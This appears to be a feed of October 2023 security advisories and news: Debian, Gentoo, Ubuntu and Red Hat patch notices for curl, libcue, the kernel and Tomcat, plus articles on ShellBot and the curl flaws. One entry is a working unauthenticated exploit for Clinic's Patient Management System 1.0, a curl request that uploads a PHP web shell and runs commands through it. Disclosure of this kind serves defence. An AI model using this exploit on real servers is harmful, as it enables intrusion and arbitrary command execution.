Debian Linux Security Advisory 5524-1 - Kevin Backhouse discovered an out-of-bounds array access in Libcue, a library for parsing CD metadata, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5524-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 11, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libcueCVE ID         : CVE-2023-43641Kevin Backhouse discovered an out-of-bounds array access in Libcue, alibrary for parsing CD metadata, which could result in the execution ofarbitrary code.For the oldstable distribution (bullseye), this problem has been fixedin version 2.2.1-3+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 2.2.1-4+deb12u1.We recommend that you upgrade your libcue packages.For the detailed security status of libcue please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libcueFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUm5a4ACgkQEMKTtsN8TjbTjQ//USLpGR9QpAIp6HVz5CUfOOYS3SabPbdNIxIxFj7B175rHH+7ZwFcu1Ox2D2AIS7jOEaMoD6H5ixmk01jG9pe1puF660Fx7f9tZkmyGhJMdHF6UmG76B/vGNmFZToXeIYFvQu54iGUSYgl99r8kQIeRPIF3AImgQnShVSSJDBBDgOqr0pWfMLoHiV5M2v2U4RQmpjw7IKXNr5gcS7mTt/Kyhba8x2WzPcG8SMew5/8/TRjxU1b+DH58EsFoJ1Ou9p2oFcYJpuEklcfilW04kEyDJ5JVyj8AOXkfuwECVehH4iOofAJdKcb/ZX2KvUdZZh+niWet59ZleJ4nvJedtAjJcFkLa9NEyfJewOkZB/FBq7vMNv+aVQqhRAREoFnA0mIRaupFSbS8wYCEDL9mavBFMv8nv/5mQ1AyDrC/pk3QcNf0qnOsJFPMAK/lBxC3775CWN0tIVFtBhxX8bsdquYQlBUzzG8cr3usLYvT1OwK07nVj+SDKRimTuGeRuBZGa08GZ7cjrlXvqLNBHWISaRgX7BjY53rDVKhg3qLJJ3xj9KneN2JJkkat8/xGXBpNkiU23D33YTFYA5CRXzAJO/T6MMHAzmqDIZ9e79oRG8WazOwUCLjCLfCghLY4brLsT86IwYCrlw9SxyfDXZelFO8xa+vkhUl/68os95udZ0NU=zzmh-----END PGP SIGNATURE-----

Debian Security Advisory 5524-1

Clinic's Patient Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE# Date: 07.10.2023# Exploit Author: Oğulcan Hami Gül# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code# Version: 1.0# Tested on: Windows 10## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.curl -i -s -k -X $'POST' \    -H $'Host: 192.168.1.36' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: multipart/form-data; boundary=---------------------------11668063818537881393672984185' -H $'Origin: http://192.168.1.36' -H $'Connection: close' -H $'Referer: http://192.168.1.36/pms/users.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 787' \    --data-binary $'-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"display_name\"\x0d\x0a\x0d\x0aCannn3\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"user_name\"\x0d\x0a\x0d\x0aGull3\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"password\"\x0d\x0a\x0d\x0acangul\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"profile_picture\"; filename=\"phps.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0a    if(isset($_GET[\'cmd\']))\x0a    {\x0a        system($_GET[\'cmd\']);\x0a    }\x0a?>\x0a\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"save_user\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11668063818537881393672984185--\x0d\x0a' \    $'http://192.168.1.36/pms/users.php'## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/user_images/ without any authentication.## With the request http://192.168.1.36/pms/user_images/1696703526phps.php?cmd=whoami the attacker can execute arbitrary command on the application server.

Clinic's Patient Management System 1.0 Shell Upload

The threat actors behind ShellBot are leveraging IP addresses transformed into its hexadecimal notation to infiltrate poorly managed Linux SSH servers and deploy the DDoS malware.
"The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value," the AhnLab Security Emergency response Center (ASEC)

The threat actors behind **ShellBot** are leveraging IP addresses transformed into its hexadecimal notation to infiltrate poorly managed Linux SSH servers and deploy the DDoS malware.

"The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value," the AhnLab Security Emergency response Center (ASEC) said in a new report published today.

ShellBot, also known by the name PerlBot, is known to breach servers that have weak SSH credentials by means of a dictionary attack, with the malware used as a conduit to stage DDoS attacks and deliver cryptocurrency miners.

Developed in Perl, the malware uses the IRC protocol to communicate with a command-and-control (C2) server.

The latest set of observed attacks involving ShellBot has been found to install the malware using hexadecimal IP addresses – hxxp://0x2763da4e/ which corresponds to 39.99.218\[.\]78 – in what's seen as an attempt to evade URL-based detection signatures.

"Due to the usage of curl for the download and its ability to support hexadecimal just like web browsers, ShellBot can be downloaded successfully on a Linux system environment and executed through Perl," ASEC said.

The development is a sign that ShellBot continues to witness steady usage to launch attacks against Linux systems.

With ShellBot capable of being used to install additional malware or launch different types of attacks from the compromised server, it's recommended that users switch to strong passwords and periodically change them to resist brute-force and dictionary attacks.

The disclosure also comes as ASEC revealed that attackers are weaponizing abnormal certificates with unusually long strings for Subject Name and Issuer Name fields in a bid to distribute information stealer malware such as Lumma Stealer and a variant of RedLine Stealer known as RecordBreaker.

"These types of malware are distributed via malicious pages that are easily accessible through search engines (SEO poisoning), posing a threat to a wide range of unspecified users," ASEC said. "These malicious pages primarily use keywords related to illegal programs such as serials, keygens, and cracks."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers

By Waqas
The company has issued security patches for two vulnerabilities.
This is a post from HackRead.com Read the original post: Critical Security Vulnerabilities in Curl Patched, Users Advised to Upgrade

All users are encouraged to upgrade to the latest version of Curl as soon as possible.

Two security vulnerabilities have recently been uncovered in Curl, a widely used open-source command-line tool and library designed for the secure transfer of data over network connections.

The first vulnerability, CVE-2023-38545, is a heap-based buffer overflow in the SOCKS5 proxy handshake that could allow an attacker to execute arbitrary code on the target system.

The second vulnerability; CVE-2023-38546 is a cookie injection vulnerability in Curl that could allow an attacker to insert cookies at will into a running program using libcurl, if a specific series of conditions are met.

The vulnerabilities, originally identified by Qualys, affect all versions of Curl from 7.69.0 to 8.3.0, which are used by millions of users and organizations around the world. Curl is used in a wide variety of applications, including downloading files, sending HTTP requests, and accessing web APIs.

The Curl team has released a patch for the vulnerability in Curl 8.4.0. Users are advised to upgrade to the latest version of Curl as soon as possible.

In addition to upgrading to the latest version of Curl, users can also protect themselves from this vulnerability by disabling the SOCKS5 proxy feature and being careful about which SOCKS5 proxies they use.

If you believe that you may have been exploited by this vulnerability, you should immediately contact your security team.

1.  Linux Vulnerability Exposes Millions of Systems to Attack
2.  ShellTorch Attack Exposes PyTorch Systems to RCE Vulnerabilities
3.  Mozilla Rushes to Fix Critical Vulnerability in Firefox and Thunderbird

Critical Security Vulnerabilities in Curl Patched, Users Advised to Upgrade

Gentoo Linux Security Advisory 202310-12 - Multiple vulnerabilities have been discovered in curl, the worst of which could result in arbitrary code execution. Versions greater than or equal to 8.3.0-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: curl: Multiple Vulnerabilities  
     Date: October 11, 2023  
     Bugs: #887745, #894676, #902801, #906590, #910564, #914091, #915195  
       ID: 202310-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in curl, the worst of  
which could result in arbitrary code execution.

Background  
==========

A command line tool and library for transferring data with URLs.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
net-misc/curl  < 8.3.0-r2    >= 8.3.0-r2

Description  
===========

Multiple vulnerabilities have been discovered in curl. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Note that the risk of remote code execution is limited to SOCKS usage.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All curl users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/curl-8.3.0-r2"

References  
==========

[ 1 ] CVE-2022-43551  
      https://nvd.nist.gov/vuln/detail/CVE-2022-43551  
[ 2 ] CVE-2022-43552  
      https://nvd.nist.gov/vuln/detail/CVE-2022-43552  
[ 3 ] CVE-2023-23914  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23914  
[ 4 ] CVE-2023-23915  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23915  
[ 5 ] CVE-2023-23916  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23916  
[ 6 ] CVE-2023-27533  
      https://nvd.nist.gov/vuln/detail/CVE-2023-27533  
[ 7 ] CVE-2023-27534  
      https://nvd.nist.gov/vuln/detail/CVE-2023-27534  
[ 8 ] CVE-2023-27535  
      https://nvd.nist.gov/vuln/detail/CVE-2023-27535  
[ 9 ] CVE-2023-27536  
      https://nvd.nist.gov/vuln/detail/CVE-2023-27536  
[ 10 ] CVE-2023-27537  
      https://nvd.nist.gov/vuln/detail/CVE-2023-27537  
[ 11 ] CVE-2023-27538  
      https://nvd.nist.gov/vuln/detail/CVE-2023-27538  
[ 12 ] CVE-2023-28319  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28319  
[ 13 ] CVE-2023-28320  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28320  
[ 14 ] CVE-2023-28321  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28321  
[ 15 ] CVE-2023-28322  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28322  
[ 16 ] CVE-2023-32001  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32001  
[ 17 ] CVE-2023-38039  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38039  
[ 18 ] CVE-2023-38545  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38545  
[ 19 ] CVE-2023-38546  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38546

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-12

Debian Linux Security Advisory 5523-1 - Two security issues were found in Curl, an easy-to-use client-side URL transfer library and command line tool.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5523-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
October 11, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : curl  
CVE ID         : CVE-2023-38545 CVE-2023-38546

Two security issues were found in Curl, an easy-to-use client-side URL  
transfer library and command line tool:

CVE-2023-38545

    Jay Satiro discovered a buffer overflow in the SOCKS5 proxy handshake.

CVE-2023-38546

    It was discovered that under some circumstances libcurl was  
    susceptible to cookie injection.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 7.74.0-1.3+deb11u10.

For the stable distribution (bookworm), these problems have been fixed in  
version 7.88.1-10+deb12u4.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUmR4AACgkQEMKTtsN8  
TjbtKBAAtJ6fPT/1ZwS+elK/8gzKI3xJFgfS6k/F5o5go30i82fFGK8k7aZNzTrw  
NQAPQ+DdWN4Nvm65qHXf8ME6jSNpnfmSSJ7k/RWVet8BJ3gMxOyBUOqAzK8CP5y1  
xW4Dnma3+EfA4g+f0fiJ8d5xTie29P+uo7qvKeUg1eCAbsUhoEortvkOtKSm/9wh  
hHq6h12LXFrDArEuOzKJZk58bo9xeMe/1BV3YdGh63lrRsz/RR/zFd51OLqn5Dgl  
eJRGwHe7pXIbaCI3mncEa0y6PHQMCZWrKdQxQC5BL4Ggut+Y2nVRMexZKzLD83Rl  
nrrD8LknLAr9QSNBjoMdf1s1rR7vboKNxYFtXcGf6nqFECQuSL4VihbJMIltUzpc  
LE4ppZxmrOs0Q78SFP+Xq5w1zMHg+2NIRx7EHDaGObvv4t3l/PoOXWI81wPxioKa  
zzxLAEVDI2Sfc6Qw/a1GmiIkEbEjhCW+LBUeOhLEfzd56W/7enCGrRFzrS6hKsbz  
Ibp2lPt6755ixpFsJ8PsVTEZ8C9jV41n8tL06BEG8+wSAc+1cHMJQ+0ceQxuXiTF  
Lrorm4rKgx76o8naAG+wPeg3rUawadAkhQzyUXKC1HqEDqcdIJhM+GL4qNI+ErPr  
E2w1K1Qo0g+1CUcYHdNTP6O3IklUwBiyJJeSn5q/AWZYH8aKdKc=  
=+znC  
-----END PGP SIGNATURE-----

Debian Security Advisory 5523-1

It was discovered that the IP-VLAN network driver for the Linux kernel did not properly initialize memory in some situations, leading to an out-of- bounds write vulnerability. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. It was discovered that the virtual terminal driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information (kernel memory). Various other issues were also addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 16.04 ESM  
-   Ubuntu 22.04 LTS  
-   Ubuntu 14.04 ESM

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems

Details

It was discovered that the IP-VLAN network driver for the Linux kernel  
did not properly initialize memory in some situations, leading to an  
out-of- bounds write vulnerability. An attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-3090)

It was discovered that the virtual terminal driver in the Linux kernel  
contained a use-after-free vulnerability. A local attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information (kernel memory). (CVE-2023-3567)

It was discovered that the universal 32bit network packet classifier  
implementation in the Linux kernel did not properly perform reference  
counting in some situations, leading to a use-after-free vulnerability.  
A local attacker could use this to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-3609)

It was discovered that the network packet classifier with  
netfilter/firewall marks implementation in the Linux kernel did not  
properly handle reference counting, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2023-3776)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel  
did not properly handle table rules flush in certain circumstances. A  
local attacker could possibly use this to cause a denial of service  
(system crash) or execute arbitrary code. (CVE-2023-3777)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel  
did not properly handle rule additions to bound chains in certain  
circumstances. A local attacker could possibly use this to cause a  
denial of service (system crash) or execute arbitrary code.  
(CVE-2023-3995)

It was discovered that the netfilter subsystem in the Linux kernel did  
not properly handle PIPAPO element removal, leading to a use-after-free  
vulnerability. A local attacker could possibly use this to cause a  
denial of service (system crash) or execute arbitrary code.  
(CVE-2023-4004)

It was discovered that some network classifier implementations in the  
Linux kernel contained use-after-free vulnerabilities. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-4128)

Ye Zhang and Nicolas Wu discovered that the io_uring subsystem in the  
Linux kernel did not properly handle locking for rings with IOPOLL,  
leading to a double-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-21400)

It was discovered that the bluetooth subsystem in the Linux kernel did  
not properly handle L2CAP socket release, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2023-40283)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 98.1  
    azure - 98.1  
    gcp - 98.1  
    generic - 98.1  
    gke - 98.1  
    gkeop - 98.1  
    ibm - 98.1  
    lowlatency - 98.1

Ubuntu 18.04 LTS  
    aws - 98.1  
    azure - 98.1  
    gcp - 98.1  
    generic - 98.1  
    generic - 98.2  
    lowlatency - 98.1  
    lowlatency - 98.2

Ubuntu 16.04 ESM  
    aws - 98.1  
    azure - 98.1  
    gcp - 98.1  
    generic - 98.1  
    lowlatency - 98.1

Ubuntu 22.04 LTS  
    aws - 98.1  
    aws - 98.2  
    azure - 98.1  
    azure - 98.2  
    gcp - 98.1  
    gcp - 98.3  
    generic - 98.1  
    generic - 98.2  
    gke - 98.1  
    ibm - 98.1

Ubuntu 14.04 ESM  
    generic - 98.1  
    lowlatency - 98.1

Support Information

Livepatches for supported LTS kernels will receive upgrades for a period  
of up to 13 months after the build date of the kernel.

Livepatches for supported HWE kernels which are not based on an LTS  
kernel version will receive upgrades for a period of up to 9 months  
after the build date of the kernel, or until the end of support for that  
kernel’s non-LTS distro release version, whichever is sooner.

References

-   CVE-2023-3090  
-   CVE-2023-3567  
-   CVE-2023-3609  
-   CVE-2023-3776  
-   CVE-2023-3777  
-   CVE-2023-3995  
-   CVE-2023-4004  
-   CVE-2023-4128  
-   CVE-2023-21400  
-   CVE-2023-40283

Kernel Live Patch Security Notice LSN-0098-1

Debian Linux Security Advisory 5522-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5522-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
October 10, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat9  
CVE ID         : CVE-2023-24998 CVE-2023-41080 CVE-2023-42795 CVE-2023-44487  
                 CVE-2023-45648

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2023-24998

    Denial of service. Tomcat uses a packaged renamed copy of Apache Commons  
    FileUpload to provide the file upload functionality defined in the Jakarta  
    Servlet specification. Apache Tomcat was, therefore, also vulnerable to the  
    Commons FileUpload vulnerability CVE-2023-24998 as there was no limit to  
    the number of request parts processed. This resulted in the possibility of  
    an attacker triggering a DoS with a malicious upload or series of uploads.

CVE-2023-41080

    Open redirect. If the ROOT (default) web application is configured to use  
    FORM authentication then it is possible that a specially crafted URL could  
    be used to trigger a redirect to an URL of the attackers choice.

CVE-2023-42795

    Information Disclosure. When recycling various internal objects, including  
    the request and the response, prior to re-use by the next request/response,  
    an error could cause Tomcat to skip some parts of the recycling process  
    leading to information leaking from the current request/response to the  
    next.

CVE-2023-44487

    DoS caused by HTTP/2 frame overhead (Rapid Reset Attack)

CVE-2023-45648

    Request smuggling. Tomcat did not correctly parse HTTP trailer headers. A  
    specially crafted, invalid trailer header could cause Tomcat to treat a  
    single request as multiple requests leading to the possibility of request  
    smuggling when behind a reverse proxy.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 9.0.43-2~deb11u7.

We recommend that you upgrade your tomcat9 packages.

For the detailed security status of tomcat9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmUlyBRfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRBnhAAk1o0EDLnX1zaS0Xnz9jybhd9XdXat1HwZXvV3XFRGVXu5+r2bKH+KQjU  
0GJ6koP3KDt10DrI8DzOq+9Msu0/TbPYAZKDHPjPYfcUqXRmwRrvTXtq5cbR5v3+  
JxgJhiqjQYb1DYiDLC5iU+6aryrZg2ma1i81lG5v8N1TDfaCHzbZiMpyeYEABkd7  
eKX3tzngoK9UaIgYVBxrjnM9bPRWnRFJRBMu/hs4VS6gxqzAaZT72Tcaf0Vf3t1s  
Es5IMgrhBC0Q2Amlm3N5z37p0nlhnJdNC3dAHetRCy92g9/KsjB/1BZfYY7rM8wV  
WwvB5WwQ0T4eRqKmc8yY86sUdfXkhPqz1oFDbnNgxtBjMm2z/of9pNEm+2NCpv9P  
3MpCIKsEWiGH8+uleGuFhAHoWeUYjDNJjH1di6+PYZoBaEJ8eiXct/THBt/0nvFR  
Nh6AFDqi1Hi5/GdPK71eFRDsXOwgSuRg1ZRJtJP1W/dYEiczP89l0CM04PwxEAn2  
dbE2ZCUQmIzQdng4OAHt+ze+QDini4HtoRJnQHq4P/QUIEQAE9C0hOIMMnrtpqIY  
A77Qa1bBVqDgLlhvSmpSrVigmfyXSpmtfc9G0KXcq5IAvr75jZ0PNuIk/VTyklYj  
e3g3nA1rbB1jlx6cvPqWBFItXW8800mJ0CXHb8EN8jKdB5BnooY=  
=6KYM  
-----END PGP SIGNATURE-----

Debian Security Advisory 5522-1

Red Hat Security Advisory 2023-5628-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include null pointer and use-after-free vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5628.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security and bug fix update  
Advisory ID:        RHSA-2023:5628-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5628  
Issue date:         2023-10-10  
Revision:           01  
CVE Names:          CVE-2023-1095  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)

* kernel: net/sched: cls_fw component can be exploited as result of failure in tcf_change_indev function (CVE-2023-3776)

* kernel: net/sched: Use-after-free vulnerabilities in the net/sched classifiers: cls_fw, cls_u32 and cls_route (CVE-2023-4128)

* kernel: netfilter: NULL pointer dereference in nf_tables due to zeroed list head (CVE-2023-1095)

* kernel: save/restore speculative MSRs during S3 suspend/resume (CVE-2023-1637)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* avoid unnecessary page fault retires on shared memory types (BZ#2221102)

* [Hyper-V][RHEL-8] Fix VM crash/hang Issues due to fast VF add/remove events (BZ#2227261)

* kernel-devel RPM cross-compiled by CKI contains host-arch scripts (BZ#2232139)

* iavf: hang in iavf_remove() - SNO node hangs after running systemctl reboot (BZ#2232405)

* netfilter: RHEL 8.8 phase 2 backports from upstream (BZ#2236818)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-1095

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5628-01

Red Hat Security Advisory 2023-5627-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include bypass, null pointer, out of bounds write, and use-after-free vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5627.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security, bug fix, and enhancement update  
Advisory ID:        RHSA-2023:5627-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5627  
Issue date:         2023-10-10  
Revision:           01  
CVE Names:          CVE-2020-36558  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: use-after-free vulnerability in the perf_group_detach function of the Linux Kernel Performance Events (CVE-2023-2235)

* kernel: ipvlan: out-of-bounds write caused by unclear skb->cb (CVE-2023-3090)

* kernel: netfilter: use-after-free due to improper element removal in nft_pipapo_remove() (CVE-2023-4004)

* kernel: net/sched: Use-after-free vulnerabilities in the net/sched classifiers: cls_fw, cls_u32 and cls_route (CVE-2023-4128)

* kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval() (CVE-2023-35001)

* kernel: race condition in VT_RESIZEX ioctl when vc_cons[i].d is already NULL leading to NULL pointer dereference (CVE-2020-36558)

* kernel: LoadPin bypass via dm-verity table reload (CVE-2022-2503)

* kernel: an out-of-bounds vulnerability in i2c-ismt driver (CVE-2022-2873)

* kernel: xfrm_expand_policies() in net/xfrm/xfrm_policy.c can cause a refcount to be dropped twice (CVE-2022-36879)

* kernel: use-after-free due to race condition in qdisc_graft() (CVE-2023-0590)

* kernel: netfilter: NULL pointer dereference in nf_tables due to zeroed list head (CVE-2023-1095)

* kernel: hash collisions in the IPv6 connection lookup table (CVE-2023-1206)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* [HPEMC RHEL 8 REGRESSION] acpi-cpufreq: Skip initialization if a cpufreq driver exists (BZ#2186307)

* [max] RHEL8.4 Pre-Alpha - [ 4.18.0-240.4.el8.dt2.ppc64le ][ fleetwood / P9 64TB/192c ] While performing DLPAR CPU operations \"BUG: arch topology borken\" messages are observed and CPU remove operation fails for removal of 140 with 255 return (BZ#2210295)

* [Intel 8.8 BUG] [SPR] IOMMU: QAT Device Address Translation Issue with Invalidation Completion Ordering (BZ#2221098)

* avoid unnecessary page fault retires on shared memory types (BZ#2221101)

* [i40e] error: Cannot set interface MAC/vlanid to 1e:b7:e2:02:b1:aa/0 for ifname ens4f0 vf 0: Resource temporarily unavailable (BZ#2228164)

* oops on cifs_mount due to null tcon (BZ#2229129)

* kernel panic due to stack overflow on ppc64le due to deep call chain. (BZ#2230268)

* [Hyper-V][RHEL 8]incomplete fc_transport implementation in storvsc causes null dereference in fc_timed_out() (BZ#2230744)

* Withdrawal: GFS2: couldn't freeze filesystem: -16 (BZ#2231826)

* [RHEL 8][Hyper-V]Excessive hv_storvsc driver logging with srb_status  SRB_STATUS_INTERNAL_ERROR  (0x30) (BZ#2231989)

* kernel-devel RPM cross-compiled by CKI contains host-arch scripts (BZ#2232138)

* RHEL-8: crypto: rng - Fix lock imbalance in crypto_del_rng (BZ#2232216)

